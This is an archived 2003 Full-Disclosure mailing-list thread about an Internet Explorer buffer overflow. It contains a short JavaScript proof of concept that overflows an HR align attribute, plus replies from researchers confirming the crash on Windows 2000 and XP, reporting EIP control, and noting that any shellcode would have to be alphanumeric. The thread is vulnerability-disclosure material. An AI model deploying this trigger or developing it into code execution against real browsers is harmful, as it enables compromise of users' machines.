[Full-Disclosure] Re: Internet Explorer >=5.0 : Buffer overflow

• Previous message: SecuriTeam: "[UNIX] Gnome Batalla Naval Remotely Exploitable Buffer Overflow (Exploit)"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: "KF" <dotslash@snosoft.com>, "Digital Scream" <digitalscream@real.xakep.ru>
Date: Wed, 25 Jun 2003 13:05:20 +0200

Hi,

I can confirm it under Windows 2000 with IE 5.50.4807.2300

Full control over the EIP, but the shellcode cannot contain (as it currently
appears) non Alpha Numeric characters, too bad I guess.

Thanks
Noam Rathaus
CTO
Beyond Security Ltd
http://www.SecurITeam.com
http://www.BeyondSecurity.com
----- Original Message -----
From: "KF" <dotslash@snosoft.com>
To: "Digital Scream" <digitalscream@real.xakep.ru>
Sent: Monday, June 23, 2003 6:43 PM
Subject: Re: Internet Explorer >=5.0 : Buffer overflow

> I can confirm this on Windows XP Professional
>
> version 6.0.2800.1106.xpsp2-030422-1633
>
> 0x43534c41 refrenced mem at 0x43534c41
> -KF
>
>
> Digital Scream wrote:
>
> >&lt;script&gt;
> > wnd=open("about:blank","","");
> > wnd.moveTo(screen.Width,screen.Height);
> > WndDoc=wnd.document;
> > WndDoc.open();
> > WndDoc.clear();
> > buffer="";
> > for(i=1;i<=127;i++)buffer+="X";
> > buffer+="DigitalScream";
> > WndDoc.write("<HR align='"+buffer+"'>");
> > WndDoc.execCommand("SelectAll");
> > WndDoc.execCommand("Copy");
> > wnd.close();
> >&lt;/script&gt;
> >
> >Grtz: Nj3l, buggzy, 3APA3A, Void Team, X - Crew
> >
> >
> >
>
>
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

• Previous message: SecuriTeam: "[UNIX] Gnome Batalla Naval Remotely Exploitable Buffer Overflow (Exploit)"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages

• [Full-Disclosure] Re: Internet Explorer >=5.0 : Buffer overflow
  ... I can confirm it under Windows 2000 with IE 5.50.4807.2300 ... Full control
  over the EIP, but the shellcode cannot contain (as it currently ... (Full-Disclosure)
• Re: older games dont work
  ... the support of my work have it and will burn a CD to me. ... and any other tips
  to make this game works will be great. ... Windows 95 including but not limited
  to: ... to map a pedal as a control ... (microsoft.public.windowsxp.games)
• [NT] Buffer Overrun in the ListBox and in the ComboBox Control Could Allow Code Execution (MS03-045)
  ... A vulnerability exists because the ListBox control and the ComboBox ...
  Windows messages provide a way for interactive processes to react to user ... elevated
  level of privileges (for example, Utility Manager in Windows ... (Securiteam)
• RE: listview vertical scrollbar width
  ... ListView control encapsulates Windows build-in List-View to leverage its ...
  Windows has two kinds of scroll bars. ... You may use Spy++ to view ListView control
  structure and its windows style ... considered the non-client area of ListView, so this WS_VSCROLL
  scrollbar is ... (microsoft.public.dotnet.framework.windowsforms.controls)
• Re: unix to win 2000 bianry file printing
  ... control file and a data file. ... If the UNIX computer sends the "f"
  control code, ... Windows will add formatting to the file while it is being sent to the
  ... If the control command is f or p, the data type is TEXT, and the spooler ...
  (microsoft.public.win2000.printing)